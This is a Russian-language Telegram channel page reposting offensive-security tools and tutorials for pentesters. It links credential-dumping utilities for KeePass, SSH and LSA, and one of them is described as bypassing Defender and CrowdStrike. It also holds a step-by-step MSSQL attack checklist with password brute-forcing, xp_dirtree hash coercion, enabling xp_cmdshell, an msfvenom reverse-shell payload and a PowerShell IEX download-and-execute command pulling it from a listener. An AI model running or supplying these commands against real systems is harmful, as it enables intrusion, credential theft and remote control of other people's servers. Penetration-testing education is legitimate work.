Канал ламера
365 subscribers
601 photos
59 videos
494 files
3.38K links
Сборник полезной информации по информационной безопасности, авторским статьям, сливам и обзорам хак-софта с ведущих IT-каналов в ТГ. Подписывайся, ну либо пропускай все самое интересное.
Download Telegram
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Для указанного домена ищет MS Exchange сервер и автоматом определяет его версию.

https://github.com/mhaskar/ExchangeFinder

#pentest #redteam #soft
Forwarded from Ralf Hacker Channel (Ralf Hacker)
DLL на C#, которая выгрузит все содержимое KeePass в открытом виде, после ее загрузки в процесс менеджера паролей.

https://github.com/d3lb3/KeeFarceReborn

#git #tools #creds #pentest #redteam
Forwarded from Proxy Bar
RedTeam-Tools
Инструменты и техники для Red TeamИмеров
over 100 tools
download

#red #pentest #tools #man
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Для получения паролей пользователей SSH в открытом виде

https://github.com/jm33-m0/SSH-Harvester

#redteam #pentest #creds #git
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Вчера вечером вспомнили [https://t.me/OffensiveTwitter/1834] про KeePass. Но все предыдущие способы дампа мастер-пароля основаны на внедрении DLL в процесс keepass.

Так вот несколько часов назад представлен новый способ: сначала можно выполнить дамп памяти упомянутого процесса, а потом выудить из него мастер-пароль. Ну круто же!

https://github.com/Orange-Cyberdefense/KeePwn

#redteam #pentest #creds #git
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Я наконец закончил просмотр докладов с прошедшего PHD12 и, как обычно, делюсь тем, что мне понравилось:

* Внедрение кода в процессы из контекста ядра Linux [video]

* Антология способов программного мониторинга и защиты Linux в пользовательском пространстве [video]

* 0-day-эксплойты рансомварщиков для Windows [video]

* Социальная инженерия: тенденции red team, технические аспекты kill chain и проектный опыт [video]

* Red teaming: методики фишинговых атак [video]

* Port security bypass: подключаемся к сети через любую розетку [video]

* Геопространственная разведка на вашем рабочем столе [video]

P.S. если у кого есть презентации данных докладов, прошу в личку @hackerralf8

#redteam #pentest #initial #osint #exploit #malware #video
Forwarded from Ralf Hacker Channel (Ralf Hacker)
This media is not supported in your browser
VIEW IN TELEGRAM
Иногда нужно найти сайты/просканировать поддомены для определенного домена. Очень сильно помогает puredns.

1. Cначала запускаем dnsvalidator. Он соберёт список отвечающих NS серверов (остановить минут через 5 работы, 3-4к серверов хватит).

dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o resolvers.txt

2. Затем запускаем puredns. Указываем словарь с поддоменами, домен для сканирования и файл, полученный на предыдущем шаге.

puredns bruteforce dns.lst domain.com -r resolvers.txt

На сканирование словарика 9.5 млн записей уйдет примерно 4 минуты))

P.S. при сканировании с wi-fi, во время скана от сети отрубились все устройства, кроме сканирующего ноута😅

#pentest #scan #dns #soft #hacktricks
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Прошел год с прошлого релиза, и вот вышло обновление:

CrackMapExec 6.0.0

P.S. Ну лично мне такой штуки как прогресс бар всегда не хватает😁

#redteam #pentest #ad #soft
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Так как BloodHound все равно очень часто используется, вот хороший софт для анализа собранных данных, особенно в случае с кастомными Cypher запросами, - PlumHound (впервые увидел тут).

При запуске указываем учетные данные для neoj4 базы, и файл (-x) с Cypher запросами (там уже присутствуют несколько списков, но у нас же есть и свои).

python3 PlumHound.py -x tasks/default.tasks -s "bolt://127.0.0.1:7687" -u "neo4j" -p "neo4j"

Получаем для каждого запроса отчеты в форматах html (как на скринах, для удобной работы) и csv (для парсинга данных) в каталоге reports.

https://github.com/PlumHound/PlumHound

P.S. Пока сам не попробовал, не осознал какая крутая штука...

#ad #enum #bloodhound #pentest #redteam #blueteam
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Visual Studio 1-click RCE: A New Exploitation Technique for Visual Studio Projects

https://github.com/cjm00n/EvilSln

#initial #fishing #redteam #pentest #git
Forwarded from Ralf Hacker Channel (Ralf Hacker)
SMTP Smuggling - Spoofing E-Mails Worldwide. Очень крутой, при этом подробный ресерч. Вкратце, благодаря смаглу сообщений, позволяет отправить сообщение от имени любого пользователя почтового сервера в обход фильтров.

https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/

P.S. Ну и судя по реакции вендоров, они того рот ... патчить это дело😁 А значит ждем много отчётов об апте, использующей данный метод

#initial #fishing #pentest #redteam
Ой, красота))) Получить данные из LSA без дампа LSASS.

Historically was able to (and may presently still) bypass:
* Windows Defender
* Malwarebytes Anti-Malware
* CrowdStrike Falcon EDR (Falcon Complete + OverWatch)


Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump

Thx to Ralf hacker
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Forwarded from PRO:PENTEST
Media is too big
VIEW IN TELEGRAM
В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:


nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3

crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login


mssqlclient.py -windows-auth sa@192.168.1.3
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins

responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash

sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[http://192.168.1.5:80/meterpreter.ps1](http://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp

msf> use exploit/windows/mssql/mssql_linkcrawler 
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass


#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
Forwarded from Life-Hack - Хакер
Наш бесплатный курс "Тестирование на проникновение" подошел к концу. Вот полный список статей, которые помогут вам начать свой путь в #Pentest.

Моделирование атаки - тестрирование на проникновение.
Основные этапы тестирования.
Сбор информации: 1 Часть.
Сбор информации: 2 Часть.
Сбор информации: 3 Часть.
Обнаружение уязвимостей.
Подбор паролей.

Обратные оболочки и полезные нагрузки.
Эксплуатация уязвимостей: 1 Часть.
Эксплуатация уязвимостей: 2 Часть.
Уклонение от средств защиты: 1 Часть.
Уклонение от средств защиты: 2 Часть.
Уклонение от средств защиты: 3 Часть.
С2 (Command and Control) сервер.

Основы Active Directory: 1 Часть.
Основы Active Directory: 2 Часть.
Kerberos, NTLM, DNS, LDAP.
Пользовательские и машинные учетные записи.
Права и привилегии в Active Directory.
Небезопасные права доступа ACL.
Active Directory Domain Enumeration

Bloodhound
AS-REP Roasting
Kerberoasting
Неограниченное делегирование.
Ограниченное делегирование.
Ограниченное делегирование на основе ресурсов.
DCShadow.

Pass-the-hash
Password Spray
Windows Server Update Services (WSUS)
System Center Configuration Manager (SCCM)
Взлом MSSQL
Responder
Netexec

Крадем учетные данные Windows
Zerologon
PetitPotam
Skeleton Key
RouterSploit
Получение DA через принтер
DCSync

SIDHistory
AdminSDHolder
Silver Ticket
Golden Ticket
Diamond Ticket
Sapphire Ticket

Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!

#статья@haccking #обучениеPentest@haccking #AD

LH | Новости | Курсы | OSINT
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Для изменения пароля пользователя AD, если есть на это право. Утилита написана на С.

https://github.com/decoder-it/ChgPass

#ad #pentest #acl